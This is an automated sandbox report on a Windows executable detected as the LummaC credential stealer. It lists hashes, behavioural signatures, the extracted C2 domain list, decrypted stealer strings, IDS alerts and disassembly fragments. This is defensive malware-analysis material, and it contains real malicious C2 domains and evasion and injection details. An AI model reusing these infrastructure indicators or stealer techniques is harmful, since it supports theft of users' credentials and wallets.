Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SoftWare(1).exe

Overview

General Information

Sample name:SoftWare(1).exe
Analysis ID:1532889
MD5:3adc9c7905f10b8c2c0b0bb7826b67a2
SHA1:e7861a02d2beac0caa3c00eb11a1b84fb54437db
SHA256:60035aa91fc8436120e0d471f046a14fd45191f5ad56bef0bb3c7688c8f0d1ad
Tags:exeuser-4k95m
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SoftWare(1).exe (PID: 3652 cmdline: "C:\Users\user\Desktop\SoftWare(1).exe" MD5: 3ADC9C7905F10B8C2C0B0BB7826B67A2)
    • conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 280 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
      • WerFault.exe (PID: 4080 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 280 -s 1724 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["enlargkiw.sbs", "allocatinow.sbs", "ehticsprocw.sbs", "drawwyobstacw.sbs", "vennurviot.sbs", "condifendteu.sbs", "resinedyw.sbs", "passimovrt.cfd", "mathcucom.sbs"], "Build id": "HpOoIh--@XXXXrty052"}
SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:01.951403+020020546531A Network Trojan was detected192.168.2.449730104.21.28.222443TCP
    2024-10-14T05:01:02.976284+020020546531A Network Trojan was detected192.168.2.449731188.114.96.3443TCP
    2024-10-14T05:01:03.964120+020020546531A Network Trojan was detected192.168.2.449732172.67.152.13443TCP
    2024-10-14T05:01:04.881092+020020546531A Network Trojan was detected192.168.2.449733172.67.205.156443TCP
    2024-10-14T05:01:06.007757+020020546531A Network Trojan was detected192.168.2.449734104.21.46.170443TCP
    2024-10-14T05:01:06.978810+020020546531A Network Trojan was detected192.168.2.449735104.21.30.221443TCP
    2024-10-14T05:01:07.883701+020020546531A Network Trojan was detected192.168.2.449736172.67.141.136443TCP
    2024-10-14T05:01:08.867229+020020546531A Network Trojan was detected192.168.2.449737188.114.96.3443TCP
    2024-10-14T05:01:11.254161+020020546531A Network Trojan was detected192.168.2.449739104.21.53.8443TCP
    2024-10-14T05:01:12.869564+020020546531A Network Trojan was detected192.168.2.449740104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:01.951403+020020498361A Network Trojan was detected192.168.2.449730104.21.28.222443TCP
    2024-10-14T05:01:02.976284+020020498361A Network Trojan was detected192.168.2.449731188.114.96.3443TCP
    2024-10-14T05:01:03.964120+020020498361A Network Trojan was detected192.168.2.449732172.67.152.13443TCP
    2024-10-14T05:01:04.881092+020020498361A Network Trojan was detected192.168.2.449733172.67.205.156443TCP
    2024-10-14T05:01:06.007757+020020498361A Network Trojan was detected192.168.2.449734104.21.46.170443TCP
    2024-10-14T05:01:06.978810+020020498361A Network Trojan was detected192.168.2.449735104.21.30.221443TCP
    2024-10-14T05:01:07.883701+020020498361A Network Trojan was detected192.168.2.449736172.67.141.136443TCP
    2024-10-14T05:01:08.867229+020020498361A Network Trojan was detected192.168.2.449737188.114.96.3443TCP
    2024-10-14T05:01:11.254161+020020498361A Network Trojan was detected192.168.2.449739104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:12.869564+020020498121A Network Trojan was detected192.168.2.449740104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:07.481620+020020565591Domain Observed Used for C2 Detected192.168.2.449736172.67.141.136443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:08.433757+020020565571Domain Observed Used for C2 Detected192.168.2.449737188.114.96.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:06.541867+020020565611Domain Observed Used for C2 Detected192.168.2.449735104.21.30.221443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:03.524458+020020565671Domain Observed Used for C2 Detected192.168.2.449732172.67.152.13443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:02.495251+020020565711Domain Observed Used for C2 Detected192.168.2.449731188.114.96.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:04.472053+020020565651Domain Observed Used for C2 Detected192.168.2.449733172.67.205.156443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:05.552086+020020565631Domain Observed Used for C2 Detected192.168.2.449734104.21.46.170443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:02.992424+020020565681Domain Observed Used for C2 Detected192.168.2.4514661.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:06.988332+020020565581Domain Observed Used for C2 Detected192.168.2.4553681.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:07.888189+020020565561Domain Observed Used for C2 Detected192.168.2.4495331.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:06.027035+020020565601Domain Observed Used for C2 Detected192.168.2.4511391.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:03.030095+020020565661Domain Observed Used for C2 Detected192.168.2.4617791.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:01.983945+020020565701Domain Observed Used for C2 Detected192.168.2.4589821.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:03.965677+020020565641Domain Observed Used for C2 Detected192.168.2.4638201.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:04.964186+020020565621Domain Observed Used for C2 Detected192.168.2.4604101.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T05:01:10.165473+020028586661Domain Observed Used for C2 Detected192.168.2.449738104.102.49.254443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: SoftWare(1).exeAvira: detected
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Source: 0.2.SoftWare(1).exe.6cf74000.5.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["enlargkiw.sbs", "allocatinow.sbs", "ehticsprocw.sbs", "drawwyobstacw.sbs", "vennurviot.sbs", "condifendteu.sbs", "resinedyw.sbs", "passimovrt.cfd", "mathcucom.sbs"], "Build id": "HpOoIh--@XXXXrty052"}
    Source: condifendteu.sbsVirustotal: Detection: 17%Perma Link
    Source: vennurviot.sbsVirustotal: Detection: 17%Perma Link
    Source: drawwyobstacw.sbsVirustotal: Detection: 17%Perma Link
    Source: mathcucom.sbsVirustotal: Detection: 20%Perma Link
    Source: sergei-esenin.comVirustotal: Detection: 17%Perma Link
    Source: resinedyw.sbsVirustotal: Detection: 17%Perma Link
    Source: enlargkiw.sbsVirustotal: Detection: 17%Perma Link
    Source: ehticsprocw.sbsVirustotal: Detection: 15%Perma Link
    Source: allocatinow.sbsVirustotal: Detection: 19%Perma Link
    Source: https://mathcucom.sbs/gVirustotal: Detection: 18%Perma Link
    Source: enlargkiw.sbsVirustotal: Detection: 17%Perma Link
    Source: drawwyobstacw.sbsVirustotal: Detection: 17%Perma Link
    Source: https://vennurviot.sbs/Virustotal: Detection: 17%Perma Link
    Source: mathcucom.sbsVirustotal: Detection: 20%Perma Link
    Source: ehticsprocw.sbsVirustotal: Detection: 15%Perma Link
    Source: allocatinow.sbsVirustotal: Detection: 19%Perma Link
    Source: https://mathcucom.sbs/Virustotal: Detection: 20%Perma Link
    Source: condifendteu.sbsVirustotal: Detection: 17%Perma Link
    Source: https://drawwyobstacw.sbs/apiVirustotal: Detection: 17%Perma Link
    Source: https://allocatinow.sbs/apiVirustotal: Detection: 19%Perma Link
    Source: https://vennurviot.sbs/apiVirustotal: Detection: 17%Perma Link
    Source: SoftWare(1).exeReversingLabs: Detection: 21%
    Source: SoftWare(1).exeVirustotal: Detection: 32%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\user\AppData\Roaming\msvcp110.dllJoe Sandbox ML: detected
    Source: SoftWare(1).exeJoe Sandbox ML: detected
    Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpString decryptor: drawwyobstacw.sbs
    Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpString decryptor: condifendteu.sbs
    Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpString decryptor: ehticsprocw.sbs
    Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpString decryptor: vennurviot.sbs
    Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpString decryptor: resinedyw.sbs
    Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpString decryptor: enlargkiw.sbs
    Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpString decryptor: allocatinow.sbs
    Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpString decryptor: mathcucom.sbs
    Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpString decryptor: passimovrt.cfd
    Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
    Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
    Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpString decryptor: HpOoIh--@XXXXrty052
    Source: SoftWare(1).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.21.28.222:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.152.13:443 -> 192.168.2.4:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.205.156:443 -> 192.168.2.4:49733 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.46.170:443 -> 192.168.2.4:49734 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.30.221:443 -> 192.168.2.4:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.141.136:443 -> 192.168.2.4:49736 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49738 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49739 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49740 version: TLS 1.2
    Source: SoftWare(1).exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF6556D FindFirstFileExW,0_2_6CF6556D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then lea eax, dword ptr [esp+70h]2_2_0058A429
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push ebx2_2_0058A429
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp ecx2_2_0059162C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-48088AD6h]2_2_00590730
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-3402AD93h]2_2_005909FC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 27BAF212h2_2_005909FC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 4E7D7006h2_2_00590A8B
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], C274D4CAh2_2_00590DDC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-62528225h]2_2_0055CE80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [eax], bl2_2_00561048
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp eax2_2_00574030
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_0057E030
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, ebx2_2_0058A0C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [eax+esi]2_2_00593090
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [0059EA1Ch], esi2_2_0055E104
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edx]2_2_005921C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push 754C8FBDh2_2_0055E259
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h2_2_00594220
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [eax+ebx], 00000030h2_2_005512D5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_0055D340
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [esp]2_2_00579467
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [eax+esi]2_2_00593430
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, eax2_2_005764CB
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ecx], dx2_2_0057C486
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h2_2_0057D541
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]2_2_0058C540
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+27DA70DAh]2_2_0057B525
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ebp-21358888h]2_2_0055D5B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, esi2_2_0055D5B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ecx], dx2_2_0057C486
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, ebx2_2_005776D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp al, 2Eh2_2_0057A68D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_005876A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebp, byte ptr [esp+esi+3Ch]2_2_005606AD
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h2_2_0057074A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0057074A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], cl2_2_0057F776
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0057F776
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, ecx2_2_0057F776
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx2_2_0057872C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], dl2_2_0057E850
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], cl2_2_0057E850
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], cl2_2_0057E850
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0057E850
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, ecx2_2_0057E850
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp eax2_2_0057C811
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push ebx2_2_0056E8F3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]2_2_00555880
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0055E919
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+48h]2_2_005739D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_0057DA80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]2_2_0057AB6E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ebp+00h], ax2_2_00570B10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [edx]2_2_0058DB90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00575B80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [edx+ebx-5Ah]2_2_00592B80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp ecx2_2_00592B80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [eax+esi]2_2_00592B80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-00000093h]2_2_00594C10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h2_2_0058AC20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx-3EFFFBA8h]2_2_00577CE3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, word ptr [ecx]2_2_00577CE3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dl, 01h2_2_00577CE3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx2_2_00577CE3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [eax+esi]2_2_00556C80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], C85F7986h2_2_00580D01
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]2_2_00591E50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+373A3ECEh]2_2_0056EEE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp di, 005Ch2_2_0056EEE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_0056EEE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push edi2_2_00590EE3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], C85F7986h2_2_00580E87
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [eax+esi]2_2_00592EA0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-05h]2_2_00576F20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-0F9FE973h]2_2_00576F20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_00576F20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], C85F7986h2_2_00580FD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebp, byte ptr [esp+esi-2Fh]2_2_00589FF0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx2_2_0057AFE3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [eax+esi]2_2_00592F90

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2056562 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) : 192.168.2.4:60410 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056566 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) : 192.168.2.4:61779 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056568 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) : 192.168.2.4:51466 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056560 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) : 192.168.2.4:51139 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056564 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) : 192.168.2.4:63820 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056570 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) : 192.168.2.4:58982 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056561 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI) : 192.168.2.4:49735 -> 104.21.30.221:443
    Source: Network trafficSuricata IDS: 2056565 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI) : 192.168.2.4:49733 -> 172.67.205.156:443
    Source: Network trafficSuricata IDS: 2056563 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI) : 192.168.2.4:49734 -> 104.21.46.170:443
    Source: Network trafficSuricata IDS: 2056559 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI) : 192.168.2.4:49736 -> 172.67.141.136:443
